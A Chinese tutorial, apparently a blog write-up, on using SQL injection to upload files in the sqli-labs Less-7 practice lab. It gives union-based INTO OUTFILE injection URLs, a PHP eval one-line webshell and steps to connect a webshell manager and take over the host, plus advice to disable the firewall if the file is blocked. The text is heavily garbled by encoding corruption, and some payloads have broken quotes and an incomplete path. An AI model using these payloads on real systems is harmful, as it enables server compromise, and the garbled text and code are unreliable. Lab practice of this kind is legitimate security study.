Sql注入文件上傳

1、sql知識(shí)基礎(chǔ)

secure_file_priv 參數(shù)

secure_file_priv 為 NULL 時(shí)，表示限制mysqld不允許導(dǎo)入或?qū)С觥?/p>

secure_file_priv 為 /tmp 時(shí)，表示限制mysqld只能在/tmp目錄中執(zhí)行導(dǎo)入導(dǎo)出，其他目錄不能導(dǎo)出導(dǎo)入。

secure_file_priv 沒(méi)有值時(shí)，表示不限制mysqld在任意目錄的導(dǎo)入導(dǎo)出。
可以使用下面語(yǔ)句查看該值：

show variables like ‘%secure%’;

secure_file_priv的值可以修改，在MySQL安裝路徑下的my.ini文件中

因?yàn)榇舜螠y(cè)試需要讀寫(xiě)權(quán)限，我將其值修改為我的網(wǎng)站根目錄。

修改之后記得重新啟動(dòng)MySQL服務(wù)
然后查詢(xún)

2、文件上傳語(yǔ)句及條件

into outfile 語(yǔ)句用于把表數(shù)據(jù)導(dǎo)出到一個(gè)文本文件中，要想mysql用戶(hù)對(duì)文件進(jìn)行導(dǎo)入導(dǎo)出，首先要看指定的權(quán)限目錄。mysql 新版本下secure_file_priv參數(shù)是用來(lái)限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()傳到哪個(gè)指定目錄的。

在這個(gè)案例中可以把值修改為我們上傳的語(yǔ)句，目錄修改為我們知道的目標(biāo)靶機(jī)的目錄。

3、上傳成功條件

1)要有file_priv權(quán)限

2)知道網(wǎng)站絕對(duì)路徑（可以通過(guò)報(bào)錯(cuò)信息、phpinfo界面、404界面等一些方式知道）

3)要能用union

4)對(duì)web目錄有寫(xiě)權(quán)限

5）select <?php @($\_POST['xx']);?> into outfile “絕對(duì)路徑/文件名”

3、實(shí)驗(yàn)步驟

1）?id=xx union select 1,2,"<?php @($\_POST['xx']);?> into outfile “文件路徑”–+

2）蟻劍、哥斯拉連接即可

4、一句話木馬

<?php @eval($_POST['password']);?>

password是預(yù)留密碼，可以自定義，在進(jìn)行webshell后臺(tái)登陸工具登錄時(shí)使用

更多一句話木馬了解可以參考一句話木馬

5、靶場(chǎng)注入

5.1 確定注入點(diǎn)及閉合方式

http://192.168.140.130/sq/Less-7/?id=1
http://192.168.140.130/sq/Less-7/?id=2

我們發(fā)現(xiàn)頁(yè)面回顯一致，當(dāng)我們加入單引號(hào)，頁(yè)面報(bào)錯(cuò)，存在注入點(diǎn)，將單引號(hào)閉合，報(bào)錯(cuò)，閉合方式不是單引號(hào)，用" "，沒(méi)有報(bào)錯(cuò)，但是使用1=1和1=2都沒(méi)有報(bào)錯(cuò)，不是雙引號(hào)報(bào)錯(cuò)，用')不對(duì)，多次嘗試，最后發(fā)現(xiàn)使用'))閉合，注釋掉不報(bào)錯(cuò)，且1=1正確頁(yè)面，1=2報(bào)錯(cuò)
確定閉合方式為'))

5.2 確定列數(shù)

http://192.168.140.130/sq/Less-7/?id=1’)) order by 5 --+
http://192.168.140.130/sq/Less-7/?id=1’)) order by 4 --+
http://192.168.140.130/sq/Less-7/?id=1’)) order by 3 --+

order by 3 的時(shí)候正確，列數(shù)為三

5.3 進(jìn)行注入

http://192.168.140.130/sq/Less-7/?id=1’)) union select 1,2,3 --+

沒(méi)有回顯，且頁(yè)面回顯提醒我們使用文件注入

5.4 進(jìn)行文件上傳注入

構(gòu)造一句話上傳木馬注入語(yǔ)句

http://192.168.140.130/sq/Less-7/?id=1’)) union select 1,“<?php @eval($_POST['pwd']); ?>”,3 into outfile “C:\phpStudy_64\phpstudy_pro\WWW” --+

當(dāng)我們執(zhí)行語(yǔ)句頁(yè)面回顯還是報(bào)錯(cuò)，但實(shí)際已經(jīng)上傳成功?？梢栽谏蟼髂夸洸榭?br />

有時(shí)這個(gè)會(huì)被防火墻阻擋，可以關(guān)閉防火墻或者容許文件存在。
打開(kāi)查看內(nèi)容

5.5 使用webshell工具進(jìn)行連接

打開(kāi)webshell工具
添加
url地址因?yàn)槲沂窃谔摂M機(jī)進(jìn)行的，所以為本地地址，連接密碼為一句話木馬設(shè)置的密碼。
連接之后就相當(dāng)于控制這臺(tái)電腦了

至此，注入目標(biāo)達(dá)成，歡迎大家指點(diǎn)評(píng)論，互相進(jìn)步